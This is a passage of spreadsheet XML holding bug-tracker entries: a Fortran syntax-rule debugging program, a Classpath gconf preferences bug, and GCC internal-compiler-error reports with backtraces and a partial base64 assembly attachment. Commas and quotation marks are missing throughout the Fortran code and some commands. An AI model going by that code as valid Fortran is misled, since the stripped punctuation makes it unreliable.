      select case (rule%type)         
      case (S_SEQUENCE)
         do i = 1 n_children
            call monitor_syntax_rules (syntax)
            write (STDERR *) before syntax_rule_set_sub i =  i
            flush (STDERR)
            call syntax_rule_set_sub (rule i syntax_get_rule_ptr (syntax &amp;
                  lexeme_get_contents (lexeme(i+3))))
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! WHY DO WE NEVER GET HERE ???  syntax_rule_set_sub claims to exit !!!
!!!! WHY IS syntax_get_rule_ptr CALLED MULTIPLE TIMES ???
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
            write (STDERR *) after syntax_rule_set_sub i
            flush (STDERR)
         end do
      end select
      write (STDERR *) exiting set_children
      flush (STDERR)
    end subroutine set_children
  end subroutine set_rule_contents
  function syntax_get_rule_ptr (syntax key) result (rule)
    type(syntax_rule_t) pointer :: rule
    type(syntax_t) intent(in) target :: syntax
    type(string_t) intent(in) :: key
    integer :: i
    write (STDERR *) entering syntax_get_rule_ptr size(syntax%rule) =  size(syntax%rule)
    flush (STDERR)
    call monitor_syntax_rules (syntax)
    do i = 1 size (syntax%rule)
       if (syntax%rule(i)%keyword == key) then
          rule =&gt; syntax%rule(i)
          write (STDERR *) exiting syntax_get_rule_ptr
          flush (STDERR)
          return
       end if
    end do
    write (STDERR *)  Syntax table: Rule  // char (key) //  not found   
    flush (STDERR)
  end function syntax_get_rule_ptr
  subroutine monitor_syntax_rules (syntax)
    type(syntax_t) intent(in) target :: syntax
    integer :: i
    write (STDERR *) entering monitor_syntax_rules size(syntax%rule) =  size(syntax%rule)
    flush (STDERR)
    do i = 1 size (syntax%rule)
       write (STDERR *) syntax%rule( i )%keyword =  char(syntax%rule(i)%keyword) &amp;
             (this will become garbage eventually ...)
       flush (STDERR)
    end do
    write (STDERR *) exiting monitor_syntax_rules
    flush (STDERR)
  end subroutine monitor_syntax_rules
end module syntax_rules
program main
  use iso_fortran_env only: STDERR =&gt; ERROR_UNIT
  use ifiles
  use syntax_rules
  type(ifile_t) :: ifile
  type(syntax_t) target save :: syntax_model_file
  write (STDERR *) Starting to load ifile
  flush (STDERR)
  call ifile_append (ifile SEQ aaaaaaaaaa = bbbbbbbbbb)
  call ifile_append (ifile KEY bbbbbbbbbb)
  write (STDERR *) Starting to interpret ifile
  flush (STDERR)
  call syntax_init (syntax_model_file ifile)
  write (STDERR *) Test finished
  flush (STDERR)
end program main</t>
  </si>
  <si>
    <t>CLASSPATH-28350</t>
  </si>
  <si>
    <t>gconf backend: stored value is not properly retrieved</t>
  </si>
  <si>
    <t>Run the attached demo app two times on Classpath. You will see that it will always print 'wrong' although when run for the 2nd (and any further) times it should print the value 'correct' which should have been stored using the preferences API.</t>
  </si>
  <si>
    <t>GCC-62204</t>
  </si>
  <si>
    <t>internal compiler error with -Wall</t>
  </si>
  <si>
    <t>Created attachment 33369
preprocessed file for reproducing -Wall related bug
I get an internal compiler error when compiling pharmer (http://pharmer.sf.net) under Ubuntu 14.04 with the packaged g++ 4.8.2 and with a version of 4.8.3 I built myself (../configure --enable-languages=cc++fortran x86_64-linux-gnu
).  The problem may also be present in 4.9.1 but manifest differently.
The command line to reproduce this error in 4.8.2/4.8.3 is:
 g++  -O3 -Wall -c   main.ii
Interestingly there is another file in the build that gets a similar error (PharmerQuery.cpp). For this file removing -Wall does not resolve the crash but passing -save-temps does so it is difficult to provide a preprocessed file. g++ 4.9.1 also cannot compile this file although with 4.9.1 this ICE goes away with the removal of -Wall (as well as -save-temps).
Below I've pasted both the output for main.ii (where removing -Wall fixes the problem) and the output for PharmerQuery.cpp (where I can't provide a .ii file).
koes@nova:~/workspace/pharmer/Release$ g++  -O3 -Wall -c   main.ii -v
Using built-in specs.
COLLECT_GCC=g++
Target: x86_64-linux-gnu
Configured with: ../configure --enable-languages=cc++fortran x86_64-linux-gnu
Thread model: posix
gcc version 4.8.3 (GCC) 
COLLECT_GCC_OPTIONS='-O3' '-Wall' '-c' '-v' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /raid/usr/local/bin/../libexec/gcc/x86_64-linux-gnu/4.8.3/cc1plus -fpreprocessed main.ii -quiet -dumpbase main.ii -mtune=generic -march=x86-64 -auxbase main -O3 -Wall -version -o /tmp/ccpGqbNt.s
GNU C++ (GCC) version 4.8.3 (x86_64-linux-gnu)
	compiled by GNU C version 4.8.3 GMP version 5.1.3 MPFR version 3.1.2-p3 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.8.3 (x86_64-linux-gnu)
	compiled by GNU C version 4.8.3 GMP version 5.1.3 MPFR version 3.1.2-p3 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 1cbd2130c9c03c77c4428f506cfeafb2
In file included from /usr/include/boost/algorithm/string/split.hpp:16:0
                 from /usr/include/boost/algorithm/string.hpp:23
                 from ../queryparsers.h:34
                 from ../main.cpp:44:
/usr/include/boost/algorithm/string/iter_find.hpp: In instantiation of â€˜SequenceSequenceT RangeT = std::basic_string FinderT = boost::algorithm::detail::token_finderF]â€™:
/usr/include/boost/algorithm/string/split.hpp:149:69:   required from â€˜SequenceSequenceT RangeT = std::basic_string PredicateT = int (*)(int)throw ()]â€™
../queryparsers.h:237:50:   required from here
/usr/include/boost/algorithm/string/iter_find.hpp:182:9: internal compiler error: Segmentation fault
         }
         ^
0x89ffdf crash_signal
	../../gcc/toplev.c:332
0x5b236a c_tree_chain_next
	../../gcc/c-family/c-common.h:1058
0x5b236a gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:158
0x5b2d01 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:495
0x5b3346 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:520
0x5b3743 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:509
0x5b3989 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:260
0x5cd8a5 gt_ggc_mx_cp_binding_level(void*)
	./gt-cp-name-lookup.h:64
0x5b269f gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:659
0x5b3787 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:366
0x5b2c84 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:476
0x5b3885 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:243
0x5cd993 gt_ggc_mx_cxx_binding(void*)
	./gt-cp-name-lookup.h:87
0x5b269f gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:659
0x5b3787 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:366
0x5b3755 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:510
0x5b4089 gt_ggc_mx_lang_type(void*)
	./gt-cp-tree.h:795
0x5b2d4a gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:500
0x5b2d39 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:499
0x5b376b gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:364
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
g++ -DOUTPUTSMINA -DEIGEN_DISABLE_STACK_SIZE_ASSERT -I/usr/local/include/openbabel-2.0 -I/home/dkoes/git/code/src/lib -I/usr/include/jsoncpp -I/usr/local/include -I/usr0/local/include -O3 -Wall -c -fmessage-length=0 -MMD -MP -MFPharmerQuery.d -MTPharmerQuery.d -oPharmerQuery.o ../PharmerQuery.cpp
../PharmerQuery.cpp: In constructor â€˜std::map::map() [with _Key = boost::exception_detail::type_info_ _Tp = boost::shared_ptr _Compare = std::less _Alloc = std::allocator &gt; &gt;]â€™:
../PharmerQuery.cpp:836:1: internal compiler error: Segmentation fault
 }
 ^
0x89ffdf crash_signal
	../../gcc/toplev.c:332
0x5b236a c_tree_chain_next
	../../gcc/c-family/c-common.h:1058
0x5b236a gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:158
0x5b2d01 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:495
0x5b2d1d gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:497
0x5b3525 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:309
0x5b2d5b gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:501
0x5b4043 gt_ggc_mx_lang_type(void*)
	./gt-cp-tree.h:790
0x5b2d4a gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:500
0x5b2c76 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:475
0x5b2c76 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:475
0x5b3525 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:309
0x5b2d5b gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:501
0x5b4043 gt_ggc_mx_lang_type(void*)
	./gt-cp-tree.h:790
0x5b2d4a gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:500
0x5b2c76 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:475
0x5b3755 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:510
0x5b2d5b gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:501
0x5b2f06 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:384
0x5b30e5 gt_ggc_mx_lang_tree_node(void*)
	./gt-cp-tree.h:551
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make: *** [PharmerQuery.o] Error 1</t>
  </si>
  <si>
    <t>koes</t>
  </si>
  <si>
    <t>GCC-7256</t>
  </si>
  <si>
    <t>When trying to make an optimized build for xfree86 i got this output: (see
also attached file)
Please notify me if this should be redirected to the binutils bugtracker.
assembler version:
# as --version
GNU assembler 020624 20020624
output:
make[4]: Entering directory `/usr/src/xc/lib/GLU/libutil'
rm -f mipmap.o
gcc -c -march=pentium4 -Wall -O3 -fomit-frame-pointer -mmmx -msse -mfpmath=s
se  -ansi -pedantic -Wall -Wpointer-arith  -I../include     -I../../../inclu
de      -I../../../include/GL  -I../../.. -I../../../exports/include   -Dlin
ux -D__i386__ -D_POSIX_C_SOURCE=199309L -D_POSIX_SOURCE -D_XOPEN_SOURCE -D_B
SD_SOURCE -D_SVID_SOURCE  -D_GNU_SOURCE   -DFUNCPROTO=15 -DNARROWPROTO   -DN
DEBUG  -v --save-temps    -fPIC mipmap.c
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/3.1.1/specs
Configured with:
../gcc/configure --prefix=/usr --program-suffix=-3.1 --with-gnu-ld --with-gn
u-as --disable-version-specific-runtime-libs --disable-shared --enable-threa
ds --enable-libunwind-exceptions --enable-concept-checks --disable-symvers -
-with-gc=page --enable-cpp
Thread model: posix
gcc version 3.1.1 20020708 (prerelease)
/usr/lib/gcc-lib/i686-pc-linux-gnu/3.1.1/cpp0 -lang-c -std=c89 -v -I../inclu
de -I../../../include -I../../../include/GL -I../../.. -I../../../exports/in
clude -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=1 -D__ELF__ -D__
unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPT
IMIZE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -D__i386 -D__i386__ -D
__pentium4 -D__pentium4__ -D__tune_pentium4__ -D__SSE__ -D__MMX__ -D__SSE2__
 -D__PIC__ -D__pic__ -Dlinux -D__i386__ -D_POSIX_C_SOURCE=199309L -D_POSIX_S
OURCE -D_XOPEN_SOURCE -D_BSD_SOURCE -D_SVID_SOURCE -D_GNU_SOURCE -DFUNCPROTO
=15 -DNARROWPROTO -DNDEBUG mipmap.c -Wall -Wall -Wpointer-arith -pedantic
mipmap.i
GNU CPP version 3.1.1 20020708 (prerelease) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 ../include
 ../../../include
 ../../../include/GL
 ../../..
 ../../../exports/include
 /usr/local/include
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.1.1/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.1.1/cc1 -fpreprocessed
mipmap.i -quiet -dumpbase
mipmap.c -march=pentium4 -mmmx -msse -mfpmath=sse -ansi -O3 -Wall -Wall -Wpo
inter-arith -pedantic -ansi -version -fomit-frame-pointer -fPIC -o mipmap.s
GNU CPP version 3.1.1 20020708 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C version 3.1.1 20020708 (prerelease) (i686-pc-linux-gnu)
        compiled by GNU C version 3.1.1 20020708 (prerelease).
mipmap.c: In function `halve1Dimage_float':
mipmap.c:1270: unable to find a register to spill in class `FLOAT_REGS'
mipmap.c:1270: this is the insn:
(insn 111 109 114 (set (subreg:SF (reg/v:DI 22 rxmm1 [73]) 0)
        (float:SF (reg:DI 0 rax [89]))) 170 {*floatdisf2_i387_only}
(insn_list 108 (nil))
    (expr_list:REG_DEAD (reg:DI 0 rax [89])
        (nil)))
mipmap.c:1270: confused by earlier errors bailing out
------=_NextPart_000_0008_01C227EC.1A3F0CE0
Content-Type: application/octet-stream
	name=mipmap.s
Content-Transfer-Encoding: base64
Content-Disposition: attachment
	filename=mipmap.s
CS5maWxlCSJtaXBtYXAuYyIKCS50ZXh0CgkuYWxpZ24gMgoJLnR5cGUJaGFsdmUxRGltYWdlX3Vi
eXRlLEBmdW5jdGlvbgpoYWx2ZTFEaW1hZ2VfdWJ5dGU6CglwdXNobAklZWJwCglwdXNobAklZWRp
CglwdXNobAklZXNpCglzdWJsCSQ4LCAlZXNwCgltb3ZsCTMyKCVlc3ApLCAlZWF4Cgltb3ZsCTI4
KCVlc3ApLCAlZWJwCgltb3ZsCTM2KCVlc3ApLCAlZXNpCgltb3ZsCSVlYnAsICVlZHgKCW1vdmwJ
JWVheCwgJWVjeAoJbW92bAk0MCglZXNwKSwgJWVkaQoJc2hybAkkMSwgJWVkeAoJc2hybAkkMSwg
JWVjeAoJY21wbAkkMSwgJWVheAoJamUJLkw2OAoJY21wbAkkMSwgJWVicAoJamUJLkw2OQouTDM3
OgoJYWRkbAkkOCwgJWVzcAoJcG9wbAklZXNpCglwb3BsCSVlZGkKCXBvcGwJJWVicAoJcmV0Ci5M
Njk6Cgltb3ZsCTQ4KCVlc3ApLCAlZWF4CglzdWJsCTUyKCVlc3ApLCAlZWF4Cgl0ZXN0bAklZWN4
LCAlZWN4Cgltb3ZsCSVlYXgsIDQoJWVzcCkKCWNzIDsgamUJLkwzNwoJbW92bAklZWN4LCAoJWVz
cCkKLkw2MDoKCW1vdmwJMjQoJWVzcCksICVlYXgKCXRlc3RsCSVlYXgsICVlYXgKCWpsZQkuTDY3
Cgltb3ZsCTI0KCVlc3ApLCAlZWN4Ci5MNTk6Cgltb3ZsCTQ4KCVlc3ApLCAlZWJwCgltb3Z6YmwJ
KCVlc2kpLCAlZWF4Cgltb3Z6YmwJKCVlYnAsJWVzaSksICVlZHgKCWFkZGwJJWVkeCwgJWVheAoJ
c2FybAkkMSwgJWVheAoJbW92YgklYWwsICglZWRpKQoJYWRkbAkkMSwgJWVkaQoJYWRkbAk0NCgl
ZXNwKSwgJWVzaQoJc3VibAkkMSwgJWVjeAoJam5lCS5MNTkKLkw2NzoKCWFkZGwJNCglZXNwKSwg
JWVzaQoJYWRkbAk0OCglZXNwKSwgJWVzaQoJc3VibAkkMSwgKCVlc3ApCglqbmUJLkw2MAoJam1w
CS5MMzcKLkw2ODoKCXRlc3RsCSVlZHgsICVlZHgKCWNzIDsgamUJLkwzNwoJbW92bAklZWR4LCAo
JWVzcCkKLkw0ODoKCW1vdmwJMjQoJWVzcCksICVlYXgKCXRlc3RsCSVlYXgsICVlYXgKCWpsZQku
TDY0Cgltb3ZsCTI0KCVlc3ApLCAlZWN4Ci5MNDc6Cgltb3ZsCTUyKCVlc3ApLCAlZWJwCgltb3Z6
YmwJKCVlc2kpLCAlZWF4Cgltb3Z6YmwJKCVlYnAsJWVzaSksICVlZHgKCWFkZGwJJWVkeCwgJWVh
eAoJc2FybAkkMSwgJWVheAoJbW92YgklYWwsICglZWRpKQoJYWRkbAkkMSwgJWVkaQoJYWRkbAk0
NCglZXNwKSwgJWVzaQoJc3VibAkkMSwgJWVjeAoJam5lCS5MNDcKLkw2NDoKCWFkZGwJNTIoJWVz
cCksICVlc2kKCXN1YmwJJDEsICglZXNwKQoJam5lCS5MNDgKCWptcAkuTDM3Ci5MZmUxOgoJLnNp
emUJaGFsdmUxRGltYWdlX3VieXRlLC5MZmUxLWhhbHZlMURpbWFnZV91Ynl0ZQoJLmFsaWduIDIK
CS50eXBlCWhhbHZlMURpbWFnZV9ieXRlLEBmdW5jdGlvbgpoYWx2ZTFEaW1hZ2VfYnl0ZToKCXB1
c2hsCSVlYnAKCXB1c2hsCSVlZGkKCXB1c2hsCSVlc2kKCXN1YmwJJDgsICVlc3AKCW1vdmwJMzIo
JWVzcCksICVlYXgKCW1vdmwJMjgoJWVzcCksICVlYnAKCW1vdmwJMzYoJWVzcCksICVlc2kKCW1v
dmwJJWVicCwgJWVkeAoJbW92bAklZWF4LCAlZWN4Cgltb3ZsCTQwKCVlc3ApLCAlZWRpCglzaHJs
CSQxLCAlZWR4CglzaHJsCSQxLCAlZWN4CgljbXBsCSQxLCAlZWF4CglqZQkuTDEyMAoJY21wbAkk
MSwgJWVicAoJamUJLkwxMjEKLkw4OToKCWFkZGwJJDgsICVlc3AKCXBvcGwJJWVzaQoJcG9wbAkl
ZWRpCglwb3BsCSVlYnAKCXJldAouTDEyMToKCW1vdmwJNDgoJWVzcCksICVlYXgKCXN1YmwJNTIo
JWVzcCksICVlYXgKCXRlc3RsCSVlY3gsICVlY3gKCW1vdmwJJWVheCwgNCglZXNwKQoJY3MgOyBq
ZQkuTDg5Cgltb3ZsCSVlY3gsICglZXNwKQouTDExMjoKCW1vdmwJMjQoJWVzcCksICVlYXgKCXRl
c3RsCSVlYXgsICVlYXgKCWpsZQkuTDExOQoJbW92bAkyNCglZXNwKSwgJWVjeAouTDExMToKCW1v
dmwJNDgoJWVzcCksICVlYnAKCW1vdnNibAkoJWVzaSksJWVheAoJbW92c2JsCSglZWJwLCVlc2kp
LCVlZHgKCWFkZGwJJWVkeCwgJWVheAoJbW92bAklZWF4LCAlZWJwCglzaHJsCSQzMSwgJWVicAoJ
YWRkbAklZWJwLCAlZWF4CglzYXJsCSQxLCAlZWF4Cgltb3ZiCSVhbCwgKCVlZGkpCglhZGRsCSQx
LCAlZWRpCglhZGRsCTQ0KCVlc3ApLCAlZXNpCglzdWJsCSQxLCAlZWN4CglqbmUJLkwxMTEKLkwx
MTk6CglhZGRsCTQoJWVzcCksICVlc2kKCWFkZGwJNDgoJWVzcCksICVlc2kKCXN1YmwJJDEsICgl
ZXNwKQoJam5lCS5MMTEyCglqbXAJLkw4OQouTDEyMDoKCXRlc3RsCSVlZHgsICVlZHgKCWNzIDsg
amUJLkw4OQoJbW92bAklZWR4LCAoJWVzcCkKLkwxMDA6Cgltb3ZsCTI0KCVlc3ApLCAlZWF4Cgl0
ZXN0bAklZWF4LCAlZWF4CglqbGUJLkwxMTYKCW1vdmwJMjQoJWVzcCksICVlY3gKLkw5OToKCW1v
dmwJNTIoJWVzcCksICVlYnAKCW1vdnNibAkoJWVzaSksJWVheAoJbW92c2JsCSglZWJwLCVlc2kp
LCVlZHgKCWFkZGwJJWVkeCwgJWVheAoJbW92bAklZWF4LCAlZWJwCglzaHJsCSQzMSwgJWVicAoJ
YWRkbAklZWJwLCAlZWF4CglzYXJsCSQxLCAlZWF4Cgltb3ZiCSVhbCwgKCVlZGkpCglhZGRsCSQx
LCAlZWRpCglhZGRsCTQ0KCVlc3ApLCAlZXNpCglzdWJsCSQxLCAlZWN4CglqbmUJLkw5OQouTDEx
NjoKCWFkZGwJNTIoJWVzcCksICVlc2kKCXN1YmwJJDEsICglZXNwKQoJam5lCS5MMTAwCglqbXAJ
Lkw4OQouTGZlMjoKCS5zaXplCWhhbHZlMURpbWFnZV9ieXRlLC5MZmUyLWhhbHZlMURpbWFnZV9i
eXRlCgkuYWxpZ24gMgoJLnR5cGUJaGFsdmUxRGltYWdlX3VzaG9ydCxAZnVuY3Rpb24KaGFsdmUx
RGltYWdlX3VzaG9ydDoKCXB1c2hsCSVlYnAKCXB1c2hsCSVlZGkKCXB1c2hsCSVlc2kKCXN1YmwJ
JDIwLCAlZXNwCgltb3ZsCTQ0KCVlc3ApLCAlZWF4Cgltb3ZsCTQwKCVlc3ApLCAlZWR4Cgltb3Zs
CTUyKCVlc3ApLCAlZWRpCgltb3ZsCSVlYXgsICVlc2kKCXNocmwJJDEsICVlZHgKCW1vdmwJJWVk
aSwgMTYoJWVzcCkKCXNocmwJJDEsICVlc2kKCWNtcGwJJDEsICVlYXgKCW1vdmwJJWVzaSwgNCgl
ZXNwKQoJbW92bAk0OCglZXNwKSwgJWVzaQoJamUJLkwxOTQKCWNtcGwJJDEsIDQwKCVlc3ApCglq
ZQkuTDE5NQouTDE1OToKCWFkZGwJJDIwLCAlZXNwCglwb3BsCSVlc2kKCXBvcGwJJWVkaQoJcG9w
bAklZWJwCglyZXQKLkwxOTU6Cgltb3ZsCTYwKCVlc3ApLCAlZWF4CglzdWJsCTY0KCVlc3ApLCAl
ZWF4Cgltb3ZsCSVlYXgsIDgoJWVzcCkKCW1vdmwJNCglZXNwKSwgJWVheAoJdGVzdGwJJWVheCwg
JWVheAoJY3MgOyBqZQkuTDE1OQoJbW92bAk0KCVlc3ApLCAlZWRpCgltb3ZsCSVlZGksIDEyKCVl
c3ApCi5MMTg2OgoJbW92bAkzNiglZXNwKSwgJWVheAoJdGVzdGwJJWVheCwgJWVheAoJamxlCS5M
MTkzCgltb3ZsCTM2KCVlc3ApLCAlZWRpCi5MMTg1OgoJbW92bAk2OCglZXNwKSwgJWVheAoJdGVz
dGwJJWVheCwgJWVheAoJamUJLkwxODMKCW1vdnpibAkxKCVlc2kpLCAlZWJwCgltb3ZsCTYwKCVl
c3ApLCAlZWF4CglzYWxsCSQ4LCAlZWJwCgltb3ZsCSVlYnAsICglZXNwKQoJbW92emJsCTEoJWVh
eCwlZXNpKSwgJWVkeAoJbW92emJsCSglZWF4LCVlc2kpLCAlZWN4Cgltb3Z6YmwJKCVlc2kpLCAl
ZWJwCglzYWxsCSQ4LCAlZWR4CglvcmwJKCVlc3ApLCAlZWJwCglvcmwJJWVkeCwgJWVjeAoJc2Fs
bAkkMTYsICVlY3gKCW9ybAklZWN4LCAlZWJwCi5MMTg0OgoJbW92bAklZWJwLCAlZWF4Cgltb3Z6
d2wJJWJwLCAlZWN4Cgltb3ZsCTE2KCVlc3ApLCAlZWR4CglzaHJsCSQxNiwgJWVheAoJYWRkbAk1
NiglZXNwKSwgJWVzaQoJYWRkbAklZWF4LCAlZWN4CglzYXJsCSQxLCAlZWN4Cgltb3Z3CSVjeCwg
KCVlZHgpCglhZGRsCSQyLCAlZWR4CglzdWJsCSQxLCAlZWRpCgltb3ZsCSVlZHgsIDE2KCVlc3Ap
CglqbmUJLkwxODUKLkwxOTM6CglhZGRsCTgoJWVzcCksICVlc2kKCWFkZGwJNjAoJWVzcCksICVl
c2kKCXN1YmwJJDEsIDEyKCVlc3ApCglqbmUJLkwxODYKCWptcAkuTDE1OQouTDE4MzoKCW1vdmwJ
NjAoJWVzcCksICVlYXgKCW1vdnp3bAkoJWVzaSksICVlYnAKCW1vdnp3bAkoJWVheCwlZXNpKSwg
JWVjeAoJc2FsbAkkMTYsICVlY3gKCW9ybAklZWN4LCAlZWJwCglqbXAJLkwxODQKLkwxOTQ6Cgl0
ZXN0bAklZWR4LCAlZWR4CgljcyA7IGplCS5MMTU5Cgltb3ZsCSVlZHgsIDEyKCVlc3ApCi5MMTcy
OgoJbW92bAkzNiglZXNwKSwgJWVheAoJdGVzdGwJJWVheCwgJWVheAoJamxlCS5MMTkwCgltb3Zs
CTM2KCVlc3ApLCAlZWJwCi5MMTcxOgoJbW92bAk2OCglZXNwKSwgJWVheAoJdGVzdGwJJWVheCwg
JWVheAoJamUJLkwxNjkKCW1vdmwJNjQoJWVzcCksICVlY3gKCW1vdnpibAkxKCVlc2kpLCAlZWF4
Cgltb3Z6YmwJKCVlc2kpLCAlZWRpCgltb3Z6YmwJMSglZWN4LCVlc2kpLCAlZWR4CglzYWxsCSQ4
LCAlZWF4Cgltb3Z6YmwJKCVlY3gsJWVzaSksICVlY3gKCXNhbGwJJDgsICVlZHgKCW9ybAklZWF4
LCAlZWRpCglvcmwJJWVkeCwgJWVjeAoJc2FsbAkkMTYsICVlY3gKCW9ybAklZWN4LCAlZWRpCi5M
MTcwOgoJbW92bAklZWRpLCAlZWF4Cgltb3Z6d2wJJWRpLCAlZWN4Cgltb3ZsCTE2KCVlc3ApLCAl
ZWR4CglzaHJsCSQxNiwgJWVheAoJYWRkbAk1NiglZXNwKSwgJWVzaQoJYWRkbAklZWF4LCAlZWN4
CglzYXJsCSQxLCAlZWN4Cgltb3Z3CSVjeCwgKCVlZHgpCglhZGRsCSQyLCAlZWR4CglzdWJsCSQx
LCAlZWJwCgltb3ZsCSVlZHgsIDE2KCVlc3ApCglqbmUJLkwxNzEKLkwxOTA6CglhZGRsCTY0KCVl
c3ApLCAlZXNpCglzdWJsCSQxLCAxMiglZXNwKQoJam5lCS5MMTcyCglqbXAJLkwxNTkKLkwxNjk6
Cgltb3ZsCTY0KCVlc3ApLCAlZWF4Cgltb3Z6d2wJKCVlc2kpLCAlZWRpCgltb3Z6d2wJKCVlYXgs
JWVzaSksICVlY3gKCXNhbGwJJDE2LCAlZWN4CglvcmwJJWVjeCwgJWVkaQoJam1wCS5MMTcwCi5M
ZmUzOgoJLnNpemUJaGFsdmUxRGltYWdlX3VzaG9ydCwuTGZlMy1oYWx2ZTFEaW1hZ2VfdXNob3J0
CgkuYWxpZ24gMgoJLnR5cGUJaGFsdmUxRGltYWdlX3Nob3J0LEBmdW5jdGlvbgpoYWx2ZTFEaW1h
Z2Vfc2hvcnQ6CglwdXNobAklZWJwCglwdXNobAklZWRpCglwdXNobAklZXNpCglzdWJsCSQyMCwg
JWVzcAoJbW92bAk0NCglZXNwKSwgJWVheAoJbW92bAk0MCglZXNwKSwgJWVkeAoJbW92bAk1Migl
ZXNwKSwgJWVkaQoJbW92bAklZWF4LCAlZXNpCglzaHJsCSQxLCAlZWR4Cgltb3ZsCSVlZGksIDE2
KCVlc3ApCglzaHJsCSQxLCAlZXNpCgljbXBsCSQxLCAlZWF4Cgltb3ZsCSVlc2ksIDQoJWVzcCkK
CW1vdmwJNDgoJWVzcCksICVlc2kKCWplCS5MMjY4CgljbXBsCSQxLCA0MCglZXNwKQoJamUJLkwy
NjkKLkwyMzM6CglhZGRsCSQyMCwgJWVzcAoJcG9wbAklZXNpCglwb3BsCSVlZGkKCXBvcGwJJWVi
cAoJcmV0Ci5MMjY5OgoJbW92bAk2MCglZXNwKSwgJWVheAoJbW92bAk0KCVlc3ApLCAlZWJwCglz
dWJsCTY0KCVlc3ApLCAlZWF4Cgl0ZXN0bAklZWJwLCAlZWJwCgltb3ZsCSVlYXgsIDgoJWVzcCkK
CWNzIDsgamUJLkwyMzMKCW1vdmwJNCglZXNwKSwgJWVkaQoJbW92bAklZWRpLCAxMiglZXNwKQou
TDI2MDoKCW1vdmwJMzYoJWVzcCksICVlY3gKCXRlc3RsCSVlY3gsICVlY3gKCWpsZQkuTDI2NwoJ
bW92bAkzNiglZXNwKSwgJWVkaQouTDI1OToKCW1vdmwJNjgoJWVzcCksICVlYXgKCXRlc3RsCSVl
YXgsICVlYXgKCWplCS5MMjU3Cgltb3Z6YmwJMSglZXNpKSwgJWVkeAoJbW92bAk2MCglZXNwKSwg
JWVheAoJc2FsbAkkOCwgJWVkeAoJbW92bAklZWR4LCAoJWVzcCkKCW1vdnpibAkxKCVlYXgsJWVz
aSksICVlZHgKCW1vdnpibAkoJWVheCwlZXNpKSwgJWVjeAoJbW92emJsCSglZXNpKSwgJWVicAoJ
c2FsbAkkOCwgJWVkeAoJb3JsCSglZXNwKSwgJWVicAoJb3JsCSVlZHgsICVlY3gKCXNhbGwJJDE2
LCAlZWN4CglvcmwJJWVjeCwgJWVicAouTDI1ODoKCW1vdmwJJWVicCwgJWVheAoJbW92c3dsCSVi
cCwlZWN4CglhZGRsCTU2KCVlc3ApLCAlZXNpCglzYXJsCSQxNiwgJWVheAoJbW92bAkxNiglZXNw
KSwgJWVicAoJYWRkbAklZWF4LCAlZWN4Cgltb3ZsCSVlY3gsICVlYXgKCXNocmwJJDMxLCAlZWF4
CglhZGRsCSVlYXgsICVlY3gKCXNhcmwJJDEsICVlY3gKCW1vdncJJWN4LCAoJWVicCkKCWFkZGwJ
JDIsICVlYnAKCXN1YmwJJDEsICVlZGkKCW1vdmwJJWVicCwgMTYoJWVzcCkKCWpuZQkuTDI1OQou
TDI2NzoKCWFkZGwJOCglZXNwKSwgJWVzaQoJYWRkbAk2MCglZXNwKSwgJWVzaQoJc3VibAkkMSwg
MTIoJWVzcCkKCWpuZQkuTDI2MAoJam1wCS5MMjMzCi5MMjU3OgoJbW92bAk2MCglZXNwKSwgJWVh
